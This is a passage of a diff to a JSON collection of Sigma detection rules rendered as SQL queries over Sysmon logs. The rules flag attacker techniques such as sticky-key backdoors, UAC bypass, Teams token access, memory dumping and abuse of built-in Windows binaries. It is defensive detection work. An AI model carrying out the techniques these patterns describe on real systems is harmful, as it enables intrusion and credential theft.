OR CommandLine LIKE '%WriteInt32%' ESCAPE '\\' OR CommandLine LIKE '%WriteProcessMemory%' ESCAPE '\\' OR CommandLine LIKE '%ZeroFreeGlobalAllocUnicode%' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' AND CommandLine LIKE '%GetLoadLibraryWAddress32%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\dump64.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Installer\\\\Feedback\\\\dump64.exe%' ESCAPE '\\')) OR (Image LIKE '%\\\\dump64.exe' ESCAPE '\\' AND (CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_inline_win_api_access.yml" + "filename": "proc_creation_win_lolbin_dump64.yml" }, { - "title": "Lolbin Ssh.exe Use As Proxy", - "id": "7d6d30b8-5b91-4b90-a891-46cccaf29598", - "status": "experimental", - "description": "Detect usage of the \"ssh.exe\" binary as a proxy to launch other programs", - "author": "frack113, Nasreddine Bencherchali", + "title": "Sticky Key Like Backdoor Execution", + "id": "2fdefcb3-dbda-401e-ae23-f0db027628bc", + "status": "test", + "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", + "author": "Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1202" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.008", + "car.2014-11-003", + "car.2014-11-008" ], "falsepositives": [ - "Legitimate usage for administration purposes" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\OpenSSH\\\\sshd.exe' ESCAPE '\\' OR (Image LIKE '%\\\\ssh.exe' ESCAPE '\\' AND (CommandLine LIKE '%ProxyCommand=%' ESCAPE '\\' OR (CommandLine LIKE '%PermitLocalCommand%' ESCAPE '\\' AND CommandLine LIKE '%LocalCommand%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wt.exe' ESCAPE '\\') AND (CommandLine LIKE '%sethc.exe%' ESCAPE '\\' OR CommandLine LIKE '%utilman.exe%' ESCAPE '\\' OR CommandLine LIKE '%osk.exe%' ESCAPE '\\' OR CommandLine LIKE '%Magnify.exe%' ESCAPE '\\' OR CommandLine LIKE '%Narrator.exe%' ESCAPE '\\' OR CommandLine LIKE '%DisplaySwitch.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_ssh.yml" + "filename": "proc_creation_win_cmd_sticky_key_like_backdoor_execution.yml" }, { - "title": "UAC Bypass Using PkgMgr and DISM", - "id": "a743ceba-c771-4d75-97eb-8a90f7f4844c", - "status": "test", - "description": "Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Service Registry Key Deleted Via Reg.EXE", + "id": "05b2aa93-1210-42c8-8d9a-2fcc13b284f5", + "status": "experimental", + "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on services registry key. Often used by attacker to remove AV software services", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\pkgmgr.exe' ESCAPE '\\' AND Image LIKE '%\\\\dism.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '% delete %' ESCAPE '\\' AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\services\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_uac_bypass_pkgmgr_dism.yml" + "filename": "proc_creation_win_reg_delete_services.yml" }, { - "title": "New Port Forwarding Rule Added Via Netsh.EXX", - "id": "322ed9ec-fcab-4f67-9a34-e7c6aef43614", - "status": "test", - "description": "Detects the execution of netsh commands that configure a new port forwarding (PortProxy) rule", - "author": "Florian Roth (Nextron Systems), omkar72, oscd.community", + "title": "Use of Wfc.exe", + "id": "49be8799-7b4d-4fda-ad23-cafbefdebbc5", + "status": "experimental", + "description": "The Workflow Command-line Compiler can be used for AWL bypass and is listed in Microsoft's recommended block rules.", + "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", "tags": [ - "attack.lateral_movement", "attack.defense_evasion", - "attack.command_and_control", - "attack.t1090" + "attack.t1127" ], "falsepositives": [ - "Legitimate administration activity", - "WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723)" + "Legitimate use by a software developer" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND ((CommandLine LIKE '%interface%' ESCAPE '\\' AND CommandLine LIKE '%portproxy%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%v4tov4%' ESCAPE '\\') OR (CommandLine LIKE '%connectp%' ESCAPE '\\' AND CommandLine LIKE '%listena%' ESCAPE '\\' AND CommandLine LIKE '%c=%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wfc.exe' ESCAPE '\\' OR OriginalFileName = 'wfc.exe'))" ], - "filename": "proc_creation_win_netsh_port_forwarding.yml" + "filename": "proc_creation_win_lolbin_wfc.yml" }, { - "title": "Suspicious Control Panel DLL Load", - "id": "d7eb979b-c2b5-4a6f-a3a7-c87ce6763819", - "status": "test", - "description": "Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Command With Teams Objects Paths", + "id": "d2eb17db-1d39-41dc-b57f-301f6512fa75", + "status": "experimental", + "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", + "author": "@SerkinValery", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.credential_access", + "attack.t1528" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\System32\\\\control.exe' ESCAPE '\\' AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE')) AND NOT (CommandLine LIKE '%Shell32.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_susp_control_dll_load.yml" + "filename": "proc_creation_win_teams_suspicious_command_line_cred_access.yml" }, { - "title": "PUA - AdFind Suspicious Execution", - "id": "9a132afa-654e-11eb-ae93-0242ac130002", - "status": "test", - "description": "Detects AdFind execution with common flags seen used during attacks", - "author": "Janantha Marasinghe (https://github.com/blueteam0ps), FPT.EagleEye Team, omkar72, oscd.community", + "title": "Potential Recon Activity Using DriverQuery.EXE", + "id": "9fc3072c-dc8f-4bf7-b231-18950000fadd", + "status": "experimental", + "description": "Detect usage of the \"driverquery\" utility to perform reconnaissance on installed drivers", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1018", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.002" + "attack.discovery" ], "falsepositives": [ - "Legitimate admin activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%domainlist%' ESCAPE '\\' OR CommandLine LIKE '%trustdmp%' ESCAPE '\\' OR CommandLine LIKE '%dcmodes%' ESCAPE '\\' OR CommandLine LIKE '%adinfo%' ESCAPE '\\' OR CommandLine LIKE '% dclist %' ESCAPE '\\' OR CommandLine LIKE '%computer\\_pwdnotreqd%' ESCAPE '\\' OR CommandLine LIKE '%objectcategory=%' ESCAPE '\\' OR CommandLine LIKE '%-subnets -f%' ESCAPE '\\' OR CommandLine LIKE '%name=\"Domain Admins\"%' ESCAPE '\\' OR CommandLine LIKE '%-sc u:%' ESCAPE '\\' OR CommandLine LIKE '%domainncs%' ESCAPE '\\' OR CommandLine LIKE '%dompol%' ESCAPE '\\' OR CommandLine LIKE '% oudmp %' ESCAPE '\\' OR CommandLine LIKE '%subnetdmp%' ESCAPE '\\' OR CommandLine LIKE '%gpodmp%' ESCAPE '\\' OR CommandLine LIKE '%fspdmp%' ESCAPE '\\' OR CommandLine LIKE '%users\\_noexpire%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_active%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_pwdnotreqd%' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_pua_adfind_susp_usage.yml" - }, - { - "title": "Microsoft Workflow Compiler Execution", - "id": "419dbf2b-8a9b-4bea-bf99-7544b050ec8d", - "status": "test", - "description": "Detects invocation of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code.", - "author": "Nik Seetharaman, frack113", - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1127", - "attack.t1218" - ], - "falsepositives": [ - "Legitimate MWC use (unlikely in modern enterprise environments)" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR OriginalFileName = 'Microsoft.Workflow.Compiler.exe'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%driverquery.exe' ESCAPE '\\' OR OriginalFileName = 'drvqry.exe') AND ((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_workflow_compiler.yml" + "filename": "proc_creation_win_driverquery_recon.yml" }, { - "title": "Potential System Information Discovery Via Wmic.EXE", - "id": "9d5a1274-922a-49d0-87f3-8c653483b909", + "title": "Potential Exploitation Attempt From Office Application", + "id": "868955d9-697e-45d4-a3da-360cefd7c216", "status": "experimental", - "description": "Detects the use of the WMI command-line (WMIC) utility to identify and display various system information,\nincluding OS, CPU, GPU, and disk drive names; memory capacity; display resolution; and baseboard, BIOS,\nand GPU driver products/versions.\nSome of these commands were used by Aurora Stealer in late 2022/early 2023.\n", - "author": "TropChaud", + "description": "Detects Office applications executing a child process that includes directory traversal patterns. This could be an attempt to exploit CVE-2022-30190 (MSDT RCE) or CVE-2021-40444 (MSHTML RCE)", + "author": "Christian Burkard (Nextron Systems), @SBousseaden (idea)", "tags": [ - "attack.discovery", - "attack.t1082" + "attack.execution", + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'WMI Commandline Utility' OR OriginalFileName = 'wmic.exe' OR Image LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND (CommandLine LIKE '%cpu get name%' ESCAPE '\\' OR CommandLine LIKE '%MEMPHYSICAL get MaxCapacity%' ESCAPE '\\' OR CommandLine LIKE '%baseboard get product%' ESCAPE '\\' OR CommandLine LIKE '%baseboard get version%' ESCAPE '\\' OR CommandLine LIKE '%bios get SMBIOSBIOSVersion%' ESCAPE '\\' OR CommandLine LIKE '%path win32\\_VideoController get name%' ESCAPE '\\' OR CommandLine LIKE '%path win32\\_VideoController get DriverVersion%' ESCAPE '\\' OR CommandLine LIKE '%path win32\\_VideoController get VideoModeDescription%' ESCAPE '\\' OR CommandLine LIKE '%OS get Caption,OSArchitecture,Version%' ESCAPE '\\' OR CommandLine LIKE '%DISKDRIVE get Caption%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\excel.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mspub.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\visio.exe' ESCAPE '\\') AND (CommandLine LIKE '%../../../..%' ESCAPE '\\' OR CommandLine LIKE '%..\\\\..\\\\..\\\\..%' ESCAPE '\\' OR CommandLine LIKE '%..//..//..//..%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wmic_recon_system_info_discovery.yml" + "filename": "proc_creation_win_exploit_cve_2021_40444_office_directory_traversal.yml" }, { - "title": "Winrar Execution in Non-Standard Folder", - "id": "4ede543c-e098-43d9-a28f-dd784a13132f", - "status": "test", - "description": "Detects a suspicious winrar execution in a folder which is not the default installation folder", - "author": "Florian Roth (Nextron Systems), Tigzy", + "title": "Powershell ChromeLoader Browser Hijacker", + "id": "27ba3207-dd30-4812-abbf-5d20c57d474e", + "status": "experimental", + "description": "Detects PowerShell process spawning a 'chrome.exe' process with the 'load-extension' flag to start a new chrome instance with custom extensions, as seen being used in 'ChromeLoader'", + "author": "Aedan Russell, frack113 (sigma)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.persistence", + "attack.t1176" ], "falsepositives": [ - "Legitimate use of WinRAR in a folder of a software that bundles WinRAR" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rar.exe' ESCAPE '\\' OR Image LIKE '%\\\\winrar.exe' ESCAPE '\\') OR Description = 'Command line RAR') AND NOT ((Image LIKE '%\\\\WinRAR%' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR Image LIKE '%\\\\UnRAR.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\chrome.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%--load-extension=%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_winrar_execution.yml" + "filename": "proc_creation_win_browsers_chrome_load_extension.yml" }, { - "title": "Python Spawning Pretty TTY on Windows", - "id": "480e7e51-e797-47e3-8d72-ebfce65b6d8d", + "title": "Suspicious Active Directory Database Snapshot Via ADExplorer", + "id": "ef61af62-bc74-4f58-b49b-626448227652", "status": "experimental", - "description": "Detects python spawning a pretty tty", - "author": "Nextron Systems", + "description": "Detects the execution of Sysinternals ADExplorer with the \"-snapshot\" flag in order to save a local copy of the active directory database to a suspicious directory.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.credential_access", + "attack.t1552.001", + "attack.t1003.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%python.exe' ESCAPE '\\' OR Image LIKE '%python3.exe' ESCAPE '\\' OR Image LIKE '%python2.exe' ESCAPE '\\') AND ((CommandLine LIKE '%import pty%' ESCAPE '\\' AND CommandLine LIKE '%.spawn(%' ESCAPE '\\') OR CommandLine LIKE '%from pty import spawn%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR OriginalFileName = 'AdExp') AND CommandLine LIKE '%snapshot%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_python_pty_spawn.yml" + "filename": "proc_creation_win_sysinternals_adexplorer_susp_execution.yml" }, { - "title": "Finger.exe Suspicious Invocation", - "id": "af491bca-e752-4b44-9c86-df5680533dbc", + "title": "PUA - Advanced IP Scanner Execution", + "id": "bef37fa2-f205-4a7b-b484-0759bfd5f86f", "status": "experimental", - "description": "Detects suspicious aged finger.exe tool execution often used in malware attacks nowadays", - "author": "Florian Roth (Nextron Systems), omkar72, oscd.community", + "description": "Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.", + "author": "Nasreddine Bencherchali (Nextron Systems), @ROxPinTeddy", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.discovery", + "attack.t1046", + "attack.t1135" ], "falsepositives": [ - "Admin activity (unclear what they do nowadays with finger.exe)" + "Legitimate administrative use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'finger.exe' OR Image LIKE '%\\\\finger.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\advanced\\_ip\\_scanner%' ESCAPE '\\' OR OriginalFileName LIKE '%advanced\\_ip\\_scanner%' ESCAPE '\\' OR Description LIKE '%Advanced IP Scanner%' ESCAPE '\\') OR (CommandLine LIKE '%/portable%' ESCAPE '\\' AND CommandLine LIKE '%/lng%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_finger_usage.yml" + "filename": "proc_creation_win_pua_advanced_ip_scanner.yml" }, { - "title": "Detected Windows Software Discovery", - "id": "e13f668e-7f95-443d-98d2-1816a7648a7b", + "title": "SQL Client Tools PowerShell Session Detection", + "id": "a746c9b8-a2fb-4ee5-a428-92bee9e99060", "status": "test", - "description": "Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.", - "author": "Nikita Nazarov, oscd.community", + "description": "This rule detects execution of a PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with the Microsoft SQL Server Management studio.\nScript blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.\n", + "author": "Agro (@agro_sev) oscd.communitly", "tags": [ - "attack.discovery", - "attack.t1518" + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1127" ], "falsepositives": [ - "Legitimate administration activities" + "Direct PS command execution through SQLToolsPS.exe is uncommon, childprocess sqltoolsps.exe spawned by smss.exe is a legitimate action." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\reg.exe' ESCAPE '\\' AND CommandLine LIKE '%query%' ESCAPE '\\' AND CommandLine LIKE '%\\\\software\\\\%' ESCAPE '\\' AND CommandLine LIKE '%/v%' ESCAPE '\\' AND CommandLine LIKE '%svcversion%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sqltoolsps.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\sqltoolsps.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\sqltoolsps.exe' ESCAPE '\\') AND NOT (ParentImage LIKE '%\\\\smss.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_software_discovery.yml" + "filename": "proc_creation_win_mssql_sqltoolsps_susp_execution.yml" }, { - "title": "Arbitrary Binary Execution Using GUP Utility", - "id": "d65aee4d-2292-4cea-b832-83accd6cfa43", + "title": "Use of VSIISExeLauncher.exe", + "id": "18749301-f1c5-4efc-a4c3-276ff1f5b6f8", "status": "experimental", - "description": "Detects execution of the Notepad++ updater (gup) to launch other commands or executables", + "description": "The \"VSIISExeLauncher.exe\" binary part of the Visual Studio/VS Code can be used to execute arbitrary binaries", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.t1127" ], "falsepositives": [ - "Other parent binaries using GUP not currently identified" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\gup.exe' ESCAPE '\\' AND Image LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\explorer.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Notepad++\\\\notepad++.exe%' ESCAPE '\\') OR (ParentImage LIKE '%\\\\Notepad++\\\\updater\\\\%' ESCAPE '\\') OR (CommandLine = '')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\VSIISExeLauncher.exe' ESCAPE '\\' OR OriginalFileName = 'VSIISExeLauncher.exe') AND (CommandLine LIKE '% -p %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_gup_arbitrary_binary_execution.yml" + "filename": "proc_creation_win_lolbin_vsiisexelauncher.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA", - "id": "ac20ae82-8758-4f38-958e-b44a3140ca88", - "status": "test", - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "author": "Nikita Nazarov, oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], + "title": "Suspicious Windows Update Agent Empty Cmdline", + "id": "52d097e2-063e-4c9c-8fbb-855c8948d135", + "status": "experimental", + "description": "Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND CommandLine LIKE '%mshta%' ESCAPE '\\' AND CommandLine LIKE '%vbscript:createobject%' ESCAPE '\\' AND CommandLine LIKE '%.run%' ESCAPE '\\' AND CommandLine LIKE '%(window.close)%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\Wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'Wuauclt.exe') AND CommandLine LIKE '%\\\\Wuauclt.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml" + "filename": "proc_creation_win_wuauclt_no_cli_flags_execution.yml" }, { - "title": "SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code", - "id": "36475a7d-0f6d-4dce-9b01-6aeb473bbaf1", + "title": "Potential Suspicious Mofcomp Execution", + "id": "1dd05363-104e-4b4a-b963-196a534b03a1", "status": "experimental", - "description": "Executes arbitrary PowerShell code using SyncAppvPublishingServer.vbs", - "author": "frack113", + "description": "Detects execution of the \"mofcomp\" utility as a child of a suspicious shell or script running utility or by having a supsicious path in the commandline.\nThe \"mofcomp\" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository.\nAttackers abuse this utility to install malicious MOF scripts\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.t1216" + "attack.execution", + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\SyncAppvPublishingServer.vbs%' ESCAPE '\\' AND CommandLine LIKE '%;%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\mofcomp.exe' ESCAPE '\\' OR OriginalFileName = 'mofcomp.exe') AND ((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wsl.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\') OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\'))) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.mof' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.mof' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml" + "filename": "proc_creation_win_mofcomp_execution.yml" }, { - "title": "Sysinternals PsService Execution", - "id": "3371f518-5fe3-4cf6-a14b-2a0ae3fd8a4f", - "status": "experimental", - "description": "Detects usage of Sysinternals PsService which can be abused for service reconnaissance and tampering", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Malicious PE Execution by Microsoft Visual Studio Debugger", + "id": "15c7904e-6ad1-4a45-9b46-5fb25df37fd2", + "status": "test", + "description": "There is an option for a MS VS Just-In-Time Debugger \"vsjitdebugger.exe\" to launch specified executable and attach a debugger.\nThis option may be used adversaries to execute malicious code by signed verified binary.\nThe debugger is installed alongside with Microsoft Visual Studio package.\n", + "author": "Agro (@agro_sev), Ensar Şamil (@sblmsrsn), oscd.community", "tags": [ - "attack.discovery", - "attack.persistence", - "attack.t1543.003" + "attack.t1218", + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate use of PsService by an administrator" + "The process spawned by vsjitdebugger.exe is uncommon." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'psservice.exe' OR (Image LIKE '%\\\\PsService.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsService64.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\vsjitdebugger.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\vsimmersiveactivatehelper%.exe' ESCAPE '\\' OR Image LIKE '%\\\\devenv.exe' ESCAPE '\\')))" ], - "filename": 